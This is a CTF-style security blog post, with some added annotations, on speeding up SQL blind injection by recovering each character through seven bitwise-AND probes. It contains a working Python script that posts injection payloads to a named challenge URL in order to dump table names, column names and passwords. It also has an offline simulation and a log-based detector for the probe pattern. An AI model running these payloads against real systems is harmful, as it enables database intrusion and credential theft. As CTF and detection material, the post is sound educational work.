SQL blind injection efficiency: guessing with the bitwise AND operation

admin · 2022-01-06 01:39:22 · Security Blog / CTF Corner

Most SQL blind-injection brute-force scripts so far guess each character by iterating over a string of printable characters and comparing the result one value at a time. Yesterday I came across an approach that recovers a string with the bitwise AND operation: each character value is determined with only 7 AND tests (one per bit of its 7-bit ASCII code), somewhat like a binary search, and compared with plain enumeration the efficiency improves significantly.

Details are in this article:
让你的SQL盲注快起来 (Make your SQL blind injection faster)

The AND-based guessing script is as follows:

def compute_by_and(word):
    # Recover every character of `word` from its bit tests and print the result
    for ele in word:
        ele_b = get_character(ele)
        print("Guess the value {}:{}".format(ele_b, chr(ele_b)))

def get_character(char):
    # Test the 7 low bits of the ASCII code one at a time (masks 1, 2, 4, ..., 64);
    # each AND test stands in for one yes/no query against the injection point.
    # 7 bits cover codes 0..127 only; a byte with bit 7 set would need an 8th test.
    char_b = ord(char)
    value = 0
    for i in range(7):
        if char_b & (2 ** i):
            value = value + (2 ** i)
    return value
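As an added illustration (not code from the original post or the referenced article), the following simulates the bit-by-bit recovery entirely offline: a plain function stands in for the yes/no oracle, so the query count behind the "7 per character" claim can be checked against the cost of trying every printable character, and it also shows the caveat that 7 probes only cover codes below 128 (a value with bit 7 set comes back wrong unless an 8th probe is made). The secret string, the 95-character printable alphabet size and the use of Python code points in place of MySQL's ascii() of the first byte are constructed assumptions.

```python
# Added example: offline model of bit-probe recovery, not the post's own code.
# Nothing here talks to a network; the "oracle" is a local function.

SECRET = "flag{bit_probe}"  # constructed sample value standing in for the DB column


def oracle(secret, pos, mask):
    """Emulate the boolean oracle: is bit `mask` set in the code of the
    character at 1-based position `pos`?  Past the end of the string the
    real query sees ascii('') which is 0 in MySQL, so every probe is False.
    Assumption: Python code points stand in for MySQL's ascii() byte value."""
    if pos > len(secret):
        return False
    return bool(ord(secret[pos - 1]) & mask)


def recover_char(secret, pos, bits=7):
    """Rebuild one character code from `bits` single-bit probes.
    Returns (code, number_of_oracle_queries)."""
    value = 0
    queries = 0
    for k in range(bits):
        queries += 1
        if oracle(secret, pos, 1 << k):
            value |= 1 << k
    return value, queries


def recover_string(secret, max_len=32, bits=7):
    """Recover characters until a code of 0 marks the end of the string,
    exactly as the post's script does.  Returns (recovered, total_queries)."""
    out = []
    total = 0
    for pos in range(1, max_len + 1):
        code, used = recover_char(secret, pos, bits)
        total += used
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out), total


def linear_scan_queries(secret, alphabet_size=95):
    """Worst-case query count for the plain approach of testing every
    printable ASCII character (95 values) per position, plus one pass to
    detect the end of the string."""
    return (len(secret) + 1) * alphabet_size


if __name__ == "__main__":
    got, n = recover_string(SECRET)
    print("recovered %r with %d queries (linear scan worst case: %d)"
          % (got, n, linear_scan_queries(SECRET)))
    # Caveat: with 7 probes a code >= 128 loses its top bit.
    print("7-bit probe of U+00E9:", recover_char("\u00e9", 1, 7)[0],
          "8-bit probe:", recover_char("\u00e9", 1, 8)[0])
```

For the 15-character sample the bit approach needs 16 × 7 = 112 oracle answers (the last 7 detect the terminator), against a worst case of 16 × 95 for plain enumeration; the cost is fixed per character rather than depending on where the character sits in the alphabet.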

Let's practise on a CTF challenge

Link:
http://111.230.11.183:44444/basic_skills/sql/sql3.php
Python SQL blind-injection script:

# coding: utf-8
import requests
import urllib.parse

url = "http://111.230.11.183:44444/basic_skills/sql/sql3.php"
# {0}: row index, {1}: character position (1-based), {2}: single-bit mask (2**k)
table_payload = "a' or 1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {0},1),{1},1))&{2} -- "
column_payload = "a' or 1 and ascii(substr((select column_name from information_schema.columns where table_name='user' limit {0},1),{1},1))&{2} -- +"
flag_payload = "a' or 1 and ascii(substr((select password from user limit {0},1),{1},1))&{2} -- "
# the MySQL comment marker -- in the payload must be followed by a space

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "http://111.230.11.183:44444",
    "Connection": "close",
    "Referer": "http://111.230.11.183:44444/basic_skills/sql/sql3.php",
    "Upgrade-Insecure-Requests": "1"
}

def get_information():
    all_name = "result:"  # every value recovered so far
    for i in range(15):  # row index
        name = ""  # the single value being recovered for this row
        for j in range(1, 33):  # character position
            value = 0  # ASCII code assembled bit by bit
            for k in range(7):  # one request per bit: masks 1, 2, 4, ..., 64
                # payload = table_payload.format(i, j, (2 ** k))
                # payload = column_payload.format(i, j, (2 ** k))
                payload = flag_payload.format(i, j, (2 ** k))
                # payload = urllib.parse.quote(payload)
                # print(payload)
                data = {
                    "username": payload,
                    "password": "sdf"
                }
                rep = requests.post(url=url, headers=headers, data=data, allow_redirects=False)
                if rep.status_code == 302:  # the login redirects only when the bit test is true
                    value = value + (2 ** k)
            if value == 0:  # ascii('') is 0: we have run past the end of this value
                if name == "":  # an empty value means there are no more rows
                    print(all_name)
                    return 1
                all_name = all_name + " " + name
                break
            name = name + chr(value)
        print(name)

if __name__ == "__main__":
    get_information()
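Seen from the other side of the wire, the script above leaves a very regular trace: for every character position the same request template is sent seven times with the mask cycling through 1, 2, 4, ..., 64. The following detector, an added example that is not part of the original post, scans request-log lines for that signature and flags clients that cycled through several distinct single-bit masks. The log lines are constructed here and their format (client address, method, path, URL-decoded body) is an assumption rather than any particular server's log layout.

```python
# Added example: detecting the bit-probe pattern in request logs.
# Not part of the original post; log format and sample lines are constructed.
import re
from collections import defaultdict

# ascii(substr(...))&<n> -- the AND against a single bit is the signature of this
# technique; an ordinary boolean injection such as "or 1=1" carries no mask.
PROBE_RE = re.compile(
    r"ascii\s*\(\s*substr(?:ing)?\s*\(.*?\)\s*\)\s*&\s*(\d+)", re.I | re.S)
SINGLE_BIT_MASKS = {1 << k for k in range(8)}  # 1, 2, 4, ..., 128

# Constructed sample log: one client running the seven probes for position 1
# (the shape of the post's flag_payload), plus a normal login, a classic
# boolean injection and a single isolated probe from other clients.
_PROBE_TEMPLATE = (
    "10.0.0.5 POST /sql3.php "
    "username=a' or 1 and ascii(substr((select password from user limit 0,1),1,1))&{} -- &password=sdf")
SAMPLE_LOG = [_PROBE_TEMPLATE.format(m) for m in (1, 2, 4, 8, 16, 32, 64)] + [
    "10.0.0.9 POST /sql3.php username=alice&password=hunter2",
    "10.0.0.7 POST /sql3.php username=a' or 1=1 -- &password=x",
    "10.0.0.8 POST /sql3.php username=a' or ascii(substr(user(),1,1))&1 -- &password=x",
]


def parse_line(line):
    """Split a constructed log line into (ip, method, path, body).
    The body keeps its spaces because maxsplit stops after the path."""
    ip, method, path, body = line.split(" ", 3)
    return ip, method, path, body


def find_probe_mask(body):
    """Return the single-bit mask of an ascii(substr(...))&mask probe in the
    request body, or None when the body does not look like one."""
    m = PROBE_RE.search(body)
    if not m:
        return None
    mask = int(m.group(1))
    return mask if mask in SINGLE_BIT_MASKS else None


def detect_bit_probes(lines, min_masks=3):
    """Group probe requests per client and report clients that used at least
    `min_masks` distinct single-bit masks, i.e. walked through a character."""
    masks_seen = defaultdict(set)
    request_count = defaultdict(int)
    for line in lines:
        ip, _, _, body = parse_line(line)
        mask = find_probe_mask(body)
        if mask is None:
            continue
        masks_seen[ip].add(mask)
        request_count[ip] += 1
    return {
        ip: {"distinct_masks": sorted(masks), "requests": request_count[ip]}
        for ip, masks in masks_seen.items()
        if len(masks) >= min_masks
    }


if __name__ == "__main__":
    for ip, info in detect_bit_probes(SAMPLE_LOG).items():
        print(ip, info)
```

The regex alone is a weak signal (a single probe from 10.0.0.8 is reported by find_probe_mask but not by detect_bit_probes), so the detector keys on the mask cycle rather than on one request. A complementary signal that needs no body inspection follows from the script itself: it distinguishes true from false answers by whether the login returns a 302, so a burst of requests from one client whose responses flip between 302 and 200 on the same endpoint is worth correlating with this pattern.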

Reference:

让你的SQL盲注快起来 (Make your SQL blind injection faster)

From: blog.cfyqy.com | Author: cfyqy

Mirror of this post on CN-SEC: http://cn-sec.com/archives/722139.html